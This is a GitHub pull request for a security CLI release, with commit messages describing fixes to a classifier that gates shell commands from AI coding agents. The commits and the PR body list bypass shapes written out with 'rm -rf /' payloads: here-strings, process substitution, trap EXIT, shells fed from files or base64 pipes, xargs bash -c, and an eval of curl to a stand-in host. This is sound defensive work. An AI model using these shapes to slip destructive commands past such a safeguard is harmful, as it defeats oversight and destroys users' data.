Repository navigation
release: promote main to prod — publishes 0.10.5 (rf-kyfe process substitution + rf-gn0h here-strings) - #259
Merged
Merged
Conversation
…256) validate-release checked that node, python and both ClawHub manifests AGREE on a version. It never checked whether the agreed version had already SHIPPED. So when main's version equalled the published one, validation PASSED and the publish job failed later, at the registry, with an error that does not say "you forgot the bump". That happened three times. Each time it left a security fix merged to a PUBLIC repo and absent from the package anyone installs — including rf-f5is, an externally reported finding, where the merge itself published a diff naming exactly which key shapes were undetected. One `npm view` and one PyPI request would have caught all three BEFORE the prod push rather than after. FAILS CLOSED, deliberately. An unreachable registry exits non-zero. A release gate that opens because it could not see is the failure being fixed wearing a different hat: the job of this check is to stop a release that would not publish, and "I do not know" is not "it is fine". VERIFIED ALL THREE WAYS, because a gate nobody has tried to break is not tested: already-published 0.10.3 exit 1 both registries report it unpublished 0.10.4 exit 0 both report 404 registries dead exit 1 npm connection refused, curl exit 7 PYPI_BASE is overridable purely so that third case is testable. An untested fail-closed branch is exactly the kind that turns out to fail OPEN the one time it matters, and pointing it at a dead port is the only way to see it go red. Co-authored-by: secbolt/crew/goldwasser <hello@rafter.so>
…s gate (rf-zvll) (#253) The instrument, not the fix. Three of the seven families this found fall OUTSIDE the floor we had agreed — `bash < file` is a redirect not a pipeline, `>(...)` is a substitution, and `trap … EXIT` is deferred execution with no pipeline at all — so a fix designed today would be patched around a shape the corpus has already outgrown. That is the one-at-a-time failure this sweep exists to end. Land the instrument first; design one fix against what it found. WHAT THE CORPUS IS. 192 rows generated from four sources, none of them a list of known bugs: the shell grammar; the classifier's own tables, parsed out of risk_rules.py at runtime; the 31 exec-capable binaries actually on PATH; and --help mining for flags whose value is a command. `executes` is GROUND TRUTH — each row was run once in a disposable sandbox with payload `touch $CANARY`, and bash adjudicated whether the payload actually ran. 129 of 192 do. The generator passed its own gate before any of this was trusted: seeded without the four known bugs, it rediscovered all four unaided, each from a DIFFERENT axis. Had they all come from one axis the generator would have been narrow and I would have said so. THREE FAMILIES NOBODY HAD WRITTEN DOWN: bash < payload.txt a shell reading its script from a REDIRECT ack >(rm -rf /) process substitution, OUTPUT direction trap 'rm -rf /' EXIT; true fires when the shell LEAVES trap-EXIT is the one no amount of staring at dangerous-looking strings produces: nothing in the command line is an execution, it is a registration. `bash < file` is the most dangerous of the three — no pipe, no -c, and the most natural thing a person would actually type. THE BASELINE IS A GATE, NOT A SUPPRESSION LIST, and that is asserted rather than claimed. The 36 under-blocks are pinned as EXPECTED FAILURES: the gate fails on any disagreement NOT baselined, so a new bypass breaks the build from day one while the known 36 block nobody, and every fix SHRINKS the list. Two tests hold the line in both directions — * removing a row while it still disagrees must FAIL * a fresh disagreeing row must FAIL Mutation-verified: make the gate unable to report a new under-block and exactly those two tests go red; drop the trap family from the corpus and the corpus-content test goes red; restore and all five pass. UNDER- AND OVER-BLOCKS ARE SEPARATE FILES, deliberately. They have opposite urgencies, and merged, a fix could trade one for the other while the total never moved. That is not hypothetical: the `\s+` separator proposed for the pty rule this week would have traded an over-block for an under-block, and only a test caught it. SCOPE, stated so nobody over-trusts it: the gate catches a classifier change that opens a new under-block on a shape the corpus already holds, and a fix that silently trades one class for the other. It does NOT discover new shapes — that needs re-running generate.py + oracle.py, which executes shell and is therefore deliberately not a CI job. The gate itself never runs a shell. No fix here. Nothing changes for users; 36 known bypasses remain open and are now visible, counted, and regression-proof. Co-authored-by: secbolt/crew/goldwasser <hello@rafter.so>
… fed from a channel (rf-gn0h + rf-zvll A/B) (#257) * fix: a here-string is data or code by the same rule as a heredoc (sable-4nt2) DO NOT MERGE AS-IS: the differential gate is RED on this branch, on purpose, and the last section says what decision that needs. Not for the current ship set — this branches off it to land after. `<<<` was mis-classified in BOTH directions, measured on the ship branch: bash <<< "rm -rf /" high <- UNDER: the shell RUNS it sh <<< "rm -rf /" high <- UNDER cat <<< "rm -rf / in docs" > notes.md critical <- OVER: cat WRITES it grep <<< "rm -rf /" high <- OVER: grep SEARCHES it Cause: `<<<` was never tokenized as one operator, so it split into `<<` plus `<`, and the here-string operand became a `<` REDIRECT TARGET — skipped, left in the string untouched. Untouched text is neither redacted nor scanned, which is how one operator managed to be wrong in both directions at once. Fix: tokenize `<<<` as a single operator and leave it out of REDIRECT_OPS, so its operand falls through to the ordinary operand path. That asks the question the heredoc work already answers — does this command execute what it reads? — and needs no new rule: bash <<< … codeCarrying -> scanned -> critical cat / grep <<< … data owner -> redacted -> low cat <<< … | bash executesOutput -> scanned -> critical That third one falls out for free from the sable-c6an predicate, and is the case a rule written only for the first two would have missed. Both runtimes, identical answers on all eight cases I measured. Five rows added to the shared battery, in both directions: two that must be critical, two GUARD rows that must stay low, one for the pipe. THE DECISION THIS NEEDS, and why I did not make it myself. The differential reports 5 PERMISSIVE REGRESSIONS — every `<data-exec> <<< "rm -rf /"` going high -> low. Those are the intended over-block fix, and they are the same exemption the gate already grants `heredoc-data`: a construct whose owner does not execute it. Making the gate green means widening its allowlist from "pure data heredoc" to "pure data heredoc OR here-string with a non-executing owner" — a two-character change to `permOk` in both corpus files. I have not made it. Widening a gate's allowlist is exactly how a real regression hides, the gate is not mine, and a branch left honestly red with the reason is better than a green one that quietly moved the line. kerckhoffs and goldwasser own that call. Note what the differential got RIGHT here, which is the argument for keeping it: it did NOT flag `bash <<< …` going high -> critical. The change is one-directional and precise, and the gate said so. * test(differential): take the here-string allowlist call, and add the row that makes it safe (rf-gn0h) achebe left e22a847 deliberately RED and handed the call to kerckhoffs and me. Taking it: the widening is correct, but NOT in the two-character form the commit proposed, and the reason is measurable rather than stylistic. THE CALL. `herestring-1` moves from perm_ok=False to perm_ok=not is_shell. That is not a new exemption, it is the SAME one the gate already grants `heredoc-data` — a construct whose owner does not execute it — applied to the same semantics wearing different syntax. Five rows go high -> low (cat, grep, tee, head, tac) and every one of them is a command that reads the here-string and prints or writes it. Blocking those was the over-block half of the bug. WHY THE BARE WIDENING WOULD HAVE BEEN A HOLE. The corpus had no here-string pipe-to-shell row at all — only the heredoc equivalents. So exempting `herestring-1` removes the gate's only view of a data owner whose OUTPUT is executed. Measured, not reasoned: corpus mutation A mutation B (codeCarrying=false) (executesOutput=false) bare two-char widening 5 REGRESSIONS CLEAN <-- hole this commit 5 REGRESSIONS 10 REGRESSIONS Mutation B breaks detection of `head <<< "rm -rf /" | bash`. Under the bare widening the gate reports DIFFERENTIAL CLEAN and that ships. The two added rows — herestring-pipe-bash / herestring-pipe-sh, perm_ok=False for EVERY exec, shell or not — are what close it. They are load-bearing, and the table above is the proof rather than the assertion. WHY THE EXEMPTION IS SAFE. It is keyed on `is_shell`, computed from the exec name inside the corpus file, never on an answer from the classifier under test. A broken candidate cannot grant itself the row. Mutation A confirms the teeth: kill the codeCarrying discrimination and all five shell here-strings light up. VERIFIED, both runtimes, identical: differential 70 -> 90 rows, CLEAN on candidate, RED under both mutations direction bash/sh/sudo bash <<< "rm -rf /" high -> critical cat/grep <<< "rm -rf /" high -> low (correct: they print) cat <<< "rm -rf /" | bash high -> critical cat <<< "marker" > /tmp/x \n rm -rf / stays critical python suite 1659 passed, 8 failed — the same 8 names on clean main 12a1429 (deep-skill env + version-vs-pyproject), so pre-existing e22a847's "DO NOT MERGE AS-IS" is discharged by this commit: the gate is green because the allowlist moved deliberately and the move is guarded, not because the red was silenced. Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_016i3RPaxQwMnJ7e9aeGyFV7 * fix(risk-rules): process substitution content is code, not a redirect target (rf-zvll A1) `<(cmd)` and `>(cmd)` were never formed as a construct. The tokenizer emitted op `<`, which is in REDIRECT_OPS, so `(cmd` became a redirect TARGET and was left untouched — while the remaining words were redacted as the host's data operands. Two independent wrong decisions conspiring: ack <(rm -rf /) sanitized to 'ack <(rm ' -> low The harmless-looking head preserved, the dangerous tail deleted. Fixing either half alone leaves the bypass, which is the thing to know when reviewing this. Fix reuses the machinery $(cmd) already has rather than adding a rule: process substitution content is a command that RUNS, so it goes in `substs` and the existing recursive scan handles it. Same shape as #249's <<< fix — a multi-character operator that must be tokenized as one unit. Both runtimes, byte-identical sanitized output. Benign use is not over-blocked: `diff <(ls) <(ls)` stays low, and a plain `cat < file` redirect is untouched. Found by the rf-zvll generated corpus, not by inspection. * fix(risk-rules): trap registers a command, so its operand is code (rf-zvll A2) `trap 'rm -rf /' EXIT` runs the payload when the shell LEAVES. The payload is an ordinary quoted operand, so without this it was redacted as prose -- exactly as `echo "..."` correctly is -- and the whole construct sanitized to 'trap EXIT; true'. Nothing in that command line looks like an execution; it is a REGISTRATION whose effect fires later. No amount of staring at dangerous-looking strings produces it, which is why it came out of the generated corpus and not a review. trap joins EVAL_EXECS, the table bash -c and ssh already use. The deferral changes the deny message and the audit trail, not the decision. Both runtimes. Benign use is not over-blocked (`trap 'echo done' EXIT`, `trap - EXIT` stay low), and the load-bearing control is that `echo "rm -rf /"` is STILL prose -- making trap code-carrying must not make every quoted operand code. 16 tests, deliberately independent of #249: nothing in them touches <<<, so if that change is reworked this file rebases onto main untouched. * test(shell-route): the gate's synthetic row must not be a real bypass (rf-zvll) Found by A2 breaking it, which is the correct outcome and worth recording. `test_a_fresh_disagreeing_row_fails_the_gate` appended a synthetic row using `trap '<payload>' EXIT` — a shape that WAS a live under-block when the test was written. Then A2 made trap code-carrying, the row stopped disagreeing, and the assertion failed. A regression test whose subject can be FIXED out from under it is self-defeating: it goes red on good news. The row is a FIXTURE, not a finding. It now uses `echo ok` with `executes: True` — a construct the recorded oracle ground truth says ran, while the classifier rates it low and always should, because the payload is genuinely harmless. The disagreement is therefore permanent and no future fix can dissolve it, which is the property a gate-mechanics test needs. Mutation-verified after the change, so the teeth are intact: make the gate unable to report a new under-block and BOTH assertions still go red; restore and all five pass. * fix(risk-rules): a shell fed its program from a channel requires approval (rf-zvll B2) Mechanism B of the shell-route sweep. Three shapes the sandboxed oracle watched EXECUTE while the classifier rated them `low`: cat payload.txt | sh payload in a file echo <b64> | base64 -d | sh payload encoded bash < payload.txt no pipe at all, just a redirect The classifier cannot read any of them, so no amount of better parsing recovers the payload. This is a POSTURE decision, not an analysis one: a shell fed from a channel requires approval regardless of whether we can see what it is being fed. THE EXCLUSION IS FREQUENCY, NOT RISK, and it is stated that way rather than dressed up as a security argument. `bash deploy.sh` is equally unreadable and stays silent because it is the overwhelmingly common legitimate form. Measured over 13,613 intercepted commands before choosing: stream forms (excluding curl|wget, already gated) 3 / 13,613 = 0.022% distinct repos affected 2 / 665 = 0.30% curl|wget into a shell, ALREADY approval-gated 100 events The one form that already prompts is 33x more common than everything this newly gates, so the added prompt volume is roughly 3% of what curl|bash already generates. The threshold was registered before the query; the sample is ONE machine and that limit, with what would overturn it, is recorded on rf-zvll. ORDERING IS LOAD-BEARING. B2 is checked AFTER the CRITICAL patterns so `echo 'rm -rf /' | sh` -- where the payload IS readable and matches -- keeps its hard block instead of being softened to an approval prompt. Move the check one loop earlier and B2 becomes a downgrade; there is a mutation test for exactly that, and it fails the two rows it should. Resolver skips wrappers, their flags AND env assignments iteratively. A single lookahead resolved `env FOO=1 bash` to `FOO=1` and missed the shell entirely -- caught by its own test row, not by review. GATE: under-blocks 29 -> 3, over-blocks flat at 34. Across the whole sweep the under-block baseline has gone 36 -> 29 (A1/A2) -> 3 (B2) with over-blocks never moving, which is the fix not trading one class for the other. The 3 that remain are all `eval "$(<unreadable producer>)"` -- a substitution, not a pipe, redirect or here-string, so OUTSIDE B2's agreed definition. Left in the baseline and reported rather than silently folded in. 18 python tests and 22 node, deliberately independent of the here-string and process-substitution work so they rebase onto main alone. * fix(risk-rules): eval of an unreadable substitution requires approval (rf-zvll B2, extended) Takes the under-block baseline to ZERO. Extended only after measuring it on the same terms as the rest, not on the argument alone. THE SEMANTIC TEST is the one that justifies B2: a program-executing consumer receives its program from a source the classifier cannot read. `eval` is such a consumer, `$(cat f)` is such a source, and pipe-versus-substitution is syntax. MEASURED FIRST, thresholds unchanged from the pre-registration: R = 0 / 13,647 commands repo-breadth = 0 / 671 -> clears (bar was 0.5% / 5%) Zero real-world occurrences, so this gates nothing anyone here actually runs. THE MATCHER NEEDED FIXING BEFORE THE COUNT MEANT ANYTHING. My first version matched `eval` anywhere in the line and scored 5 hits -- every one a FALSE POSITIVE: "eval harness reporting", "eval-must-fix.ts", the word `eval` inside a PR description. Real traffic contains the word in prose and filenames; my synthetic negative set did not. Tightened to require `eval` at a COMMAND position, re-validated against those exact shapes, and the count went to zero. A validated-on-synthetics matcher is not a validated matcher. BROAD, NOT READER-ONLY, and that was decided by a test rather than taste. A narrow version keyed on data-readers (cat/base64/xxd) looked tighter and misses eval "$(curl -s http://evil.sh)" which is remote code execution -- the worst shape in the set. There is a test named for that miss, and mutating the rule to the narrow design fails exactly the curl rows. GATE: under-blocks 3 -> 0, over-blocks flat at 34. Across the whole sweep: baseline 36 under 34 over A1/A2 29 34 B2 3 34 + eval 0 34 Over-blocks never moved at any step. The baseline file now carries a note that it is EMPTY and must stay so: with no known-broken rows, a new bypass has nothing to hide among, and adding a row is a decision to live with a bypass rather than a bookkeeping act. 27 python tests and 43 node, independent of the here-string and process-substitution work. * test(shell-route): the second gate test owned the bug list too (rf-zvll) Same disease as the sibling test, found the same way -- by fixing something. `test_baseline_cannot_hide_a_row_that_still_disagrees` took its victim from the REAL baseline: `under["keys"][0]`. That worked while the baseline had entries. The eval extension took the last under-block to zero, the baseline went EMPTY, and the test had nothing to drop. It failed loudly rather than silently, because I had written `assert under["keys"], "baseline is empty; this test would be vacuous"` when I wrote it -- so the guard did its job. But a guard that converts a vacuous pass into a red build is a diagnosis, not a fix. THE RULE, now applied to both gate tests: a test of the GATE must not depend on the current BUG LIST. The bug list is designed to shrink to zero, and a mechanics test has to keep working after it does. Both tests now construct their own permanently-disagreeing fixture -- `echo ok` recorded as executing, which no future fix can dissolve because the payload is genuinely harmless -- and assert against that rather than borrowing whatever bypass happens to be open today. Mutation-verified after the change: make the gate unable to report a new under-block and BOTH assertions go red; restore and all five pass. * test(shell-route): repair Measure A — payloads derived from the rules (rf-zvll) Measure A answers the one question B, C and D cannot: is the corpus's coverage COMPLETE, or merely plausible? It now reports 100% with 0 uncovered, and — more importantly — it can report otherwise. THREE EARLIER VERSIONS WERE WRONG, each producing a confident number: v1 extracted the wrong bracket (`list[str]` ate a lazy match), so the mutation deleted nothing and every rule read "not killed". 0%. v2 fixed that, still 0%: the two `rm` rules are REDUNDANT — each matches what the other does, so deleting either alone changes no verdict — and every row used ONE hand-written payload, leaving mkfs/dd/fdisk with nothing to exercise them. v3 varied across NINE HAND-PICKED shapes and reported 41%. That hand-list was the last hand-written component in the whole sweep, sitting inside the instrument built to catch exactly that. NOW: an example is generated FOR EACH RULE from the rule's own compiled parse tree (LITERAL/IN/MAX_REPEAT/SUBPATTERN/BRANCH/AT/ANY — the seven constructs these rules actually use), so coverage is complete by construction rather than by my imagination. Each example is SELF-CHECKED against the rule it came from; one that does not match is reported, never counted. 23/23 verified. MUTATION IS BY LIST INDEX, NOT SOURCE TEXT. assess_command_risk iterates the module-level pattern lists at call time, so popping an element is a real mutation. The earlier text-matching version could not touch the two f-string rules — `rf"rm\s+…{_CRITICAL_DIRS}…"`, whose compiled text never appears verbatim in the file — and silently dropped them from the DENOMINATOR, which is the worst place for a rule to go missing. They are measured now. SENSITIVITY PROVEN, because a measure that can only say 100% is worthless: payloads coverage uncovered single hand-picked (v3 design) 21% 18 derived from the rules 100% 0 RESULT: 22 killed, 1 redundant, 0 uncovered, 4,439 classifications. The one redundant rule is the `rm` sibling pair, correctly identified as covered rather than reported as a gap — which is what v2 got wrong. --------- Co-authored-by: secbolt/crew/goldwasser <hello@rafter.so> Co-authored-by: Claude Opus 5 <noreply@anthropic.com>
Bump node, python and both ClawHub skill manifests 0.10.4 -> 0.10.5 so the release gate added in #256 can pass, and record what this release ships. 0.10.5 carries the two classifier fixes already on main in be89a75: process substitution (rf-kyfe) and here-strings (rf-gn0h). Both were verified by running the PUBLISHED 0.10.4 artifact against each probe and a build of this tree after, with allow-controls so the change discriminates. The CHANGELOG records three bypasses this release does NOT fix (rf-uajq, rf-htc8, rf-blzj) rather than leaving them unstated. Co-authored-by: Rome-1 <roamforward1@gmail.com>
Raftersecurity
approved these changes
Sep 16, 2026
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
This is the promote PR: merging it publishes to npm and PyPI. It tracks
main, so it will pick up the version bump automatically once #258 merges, andvalidate-releasewill go green at that point. Until then it is red for one reason only:mainstill says0.10.4and0.10.4is already on both registries, which is #256's gate working as designed.Order: approve #258 → it merges to
main→ this goes green → approve this. I will confirm green here before asking for the second approval.What merging this publishes
Two live classifier bypasses, both fixed on
maininbe89a75. Verified by running the published 0.10.4 artifact against each probe and a build ofmainafter, with allow-controls so the result discriminates rather than just blocking more:grep -q x <(rm -rf /)printf %s <(rm -rf /)bash <<< "rm -rf /"cat <<< "just some text"The here-string fix moves in both directions deliberately. An over-block teaches users to disable the hook, so it is not a safe failure.
Also promoted: the release guard (#256) and the shell-route corpus with an expected-failures gate (#253).
Still live for users after this ships
Stated here so the release is not mistaken for closing the classifier surface:
echo "rm -rf /" | xargs bash -cremains low and allowed.be89a75does not reach it: its stream-resolution path requires an eval-class program with a literal substitution, a shell-class program fed</<<<, or a pipe into a shell-class program;xargsis eval-class but not shell-class, with no substitution token. Control:| bashis denied atcritical..rafter.ymlfails the Write/Edit secret scan open in Python. Command classification is unaffected..rafter.ymldocs:still accepts absolute paths, paths outside the repo, and arbitrary URLs.v1is 115 commits behindmain, so no CLI release changes anything for Action consumers. Tracked separately as sable-oubg.After merging
Check the registry, not the job:
npm view @rafter-security/cli versionmust read0.10.5. Three prior releases hid a gap behind a green publish job, which is why #256 exists.